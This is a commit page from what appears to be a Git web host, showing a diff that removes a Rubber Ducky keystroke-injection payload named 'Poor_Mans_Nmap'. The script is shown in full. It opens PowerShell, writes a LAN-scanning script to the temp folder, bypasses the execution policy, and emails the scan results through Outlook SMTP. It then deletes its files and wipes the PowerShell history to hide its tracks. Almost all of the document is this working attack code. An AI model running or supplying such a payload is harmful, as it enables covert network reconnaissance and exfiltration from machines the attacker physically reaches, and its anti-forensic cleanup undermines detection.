Moved Poor_Mans_Nmap to exfiltration category
JoustingZebra
GitHub
parent
f4e6492025
commit
bbfbce2f3d
|
|
@ -1,47 +0,0 @@
|
|||
REM Title: Poor_Mans_Nmap
|
||||
REM Author: JoustingZebra
|
||||
REM Description: Writes powershell LAN scanner "netscan.ps1" and runs it. Then emails results using outlook.
|
||||
REM Target: Windows with powershell v5/7.
|
||||
REM Props: Hak5, the-jcksn
|
||||
REM Version: 1.0
|
||||
REM Category: General
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
REM Open PowerShell, noprofile, noninteractive
|
||||
STRING powershell.exe -Nop -Noni
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM Write .ps1 file
|
||||
REM Scanner only works on class "B" and smaller networks.
|
||||
REM Script is optimized, only scans valid IP addresses in the network.
|
||||
REM Only scans first LAN it finds.
|
||||
REM IPv4 only :(
|
||||
|
||||
STRING Write-Output "function Get-BroadAddr (`$AddrAndCIDR){ `n `$AddrAndCIDR = `$AddrAndCIDR.Split(`"/`") `n `$AddrInBin = (New-IPv4toBin `$AddrAndCidr[0]).ToCharArray() `n for(`$i=0;`$i -lt `$AddrInBin.length;`$i++){ `n if(`$i -ge `$AddrAndCIDR[1]) `n { `n `$AddrInBin[`$i] = `"1`" `n `n} `n } `n [string[]]`$AddrInInt32 = @() `n for (`$i = 0;`$i -lt `$AddrInBin.length;`$i++){ `n `$PartialAddrBin += `$AddrInBin[`$i] `n if((`$i+1)%8 -eq 0){ `n `$PartialAddrBin = `$PartialAddrBin -join `"`" `n `$AddrInInt32 += [Convert]::ToInt32(`$PartialAddrBin -join `"`",2) `n `$PartialAddrBin = `"`" `n } `n } `n `$AddrInInt32 = `$AddrInInt32 -join `".`" `n return `$AddrInInt32 `n } `n function New-IPv4toBin (`$ipv4){ `n `$BinNum = `$ipv4 -split '\.' | ForEach-Object {[System.Convert]::ToString(`$_,2).PadLeft(8,'0')} `n return `$binNum -join `"`" `n } `n `$Adapter = (Get-NetAdapter | Where-Object {`$_.status -eq 'Up'} | Select-Object -First 1) `n `$AdapterAddr=(Get-NetIPAddress -InterfaceIndex `$Adapter.ifIndex | Where-Object {`$_.ipv4address}) `n `$IPaddr=[ipaddress](`$AdapterAddr.IPAddress) `n `$CIDRSubMask=(Get-NetIPAddress -InterfaceIndex `$Adapter.ifIndex | Select-Object -ExpandProperty PrefixLength) `n `$IPAddrAndMask=(`$IPaddr | select-object -ExpandProperty IPAddressToString ) + `"/`" +(`$CIDRSubMask | Out-String) `n Write-Host `"Localhost = `$IPaddrAndMask`" `n `$SubMask = [ipaddress]([math]::pow(2, 32) -1 -bxor [math]::pow(2, (32 - `$CIDRSubMask))-1) `n Write-Host `"Subnet mask = `$SubMask`" `n `$NetAddr=[ipaddress](`$IPaddr.address -band `$SubMask.address) `n Write-Host `"Network Address = `$NetAddr`" `n `$NetAddrOctet0=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[0] `n `$NetAddrOctet1=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[1] `n `$NetAddrOctet2=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[2] `n `$NetAddrOctet3=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[3] `n `$BroadAddr=[ipaddress](Get-BroadAddr(`$IPAddrAndMask)) `n Write-Host `"Broadcast Address = `$BroadAddr`" `n `$BroadAddrOctet2=[int]([System.Net.IpAddress]::Parse(`$BroadAddr)).GetAddressbytes()[2] `n `$BroadAddrOctet3=[int]([System.Net.IpAddress]::Parse(`$BroadAddr)).GetAddressbytes()[3] `n Write-Host `"`n`" `n Write-Host `"### Scanning Network `$NetAddr - `$BroadAddr ###`" `n Write-Host `"`n`" `n for(`$i=`$NetAddrOctet3+1; `$i -lt `$BroadAddrOctet3 ; `$i++){ `n `$pcomplete = (`$i / `$BroadAddrOctet3) * 100 `n `$PingAddr=[string]([string]`$NetAddrOctet0 + `".`" + [string]`$NetAddrOctet1 + `".`" + [string]`$NetAddrOctet2 + `".`" + [string]`$i) `n Write-Progress -Activity Scanning -Status 'Progress->' -PercentComplete `$pcomplete -CurrentOperation OuterLoop `n if ((Test-Connection `$PingAddr -Quiet -Count 1) -and ([string]`$IPaddr -ne `$PingAddr)){ `n `$Output=`$(Get-NetNeighbor -IPAddress `$PingAddr -ErrorAction SilentlyContinue | Select-Object -Property IPAddress,LinkLayerAddress,State | Format-Table -HideTableHeaders | Out-String) `n `$Output=(`$Output -replace `"`n`",`"`") `n Write-Host `$Output `n } `n if (`$NetAddrOctet2 -ne `$BroadAddrOctet2){ `n for (`$j=`$NetAddrOctet2+1; `$j -lt `$BroadAddrOctet2 ; `$j++){ `n `$pincomplete = (`$j / `$BroadAddrOctet2) * 100 `n Write-Progress -Id 1 -Activity Updating -Status 'Progress' -PercentComplete `$pincomplete -CurrentOperation InnerLoop `n if (Test-Connection `$PingAddr -Quiet -Count 1){ `n Write-Host `$PingAddr `n } `n } `n } `n } `n " | Out-File $ENV:temp/netscan.ps1
|
||||
ENTER
|
||||
DELAY 1000
|
||||
REM Give process ability to run unsigned scripts
|
||||
STRING Set-ExecutionPolicy Bypass -Scope Process
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING cd $ENV:temp
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM Execute and email results as attached .txt file
|
||||
REM Line condensed into one so the rubber ducky can be removed without waiting for the script to finish.
|
||||
REM The script is not multi-threaded, so it takes about 6 minutes to scan a class "C" subnet.
|
||||
REM Conducts cleanup and removes history to protect email creds.
|
||||
|
||||
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
|
||||
STRING .\netscan.ps1 | Out-File netscan.txt && Send-MailMessage -From user@example.com -To user@example.com -Subject "LAN scan" -Body "From Rubber Ducky" -Attachment $ENV:temp\netscan.txt -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force)) && Remove-Item netscan.* -Force && Remove-Item (Get-PSReadlineOption).HistorySavePath -Force && Clear-History
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
EXIT
|
||||
Loading…
Reference in New Issue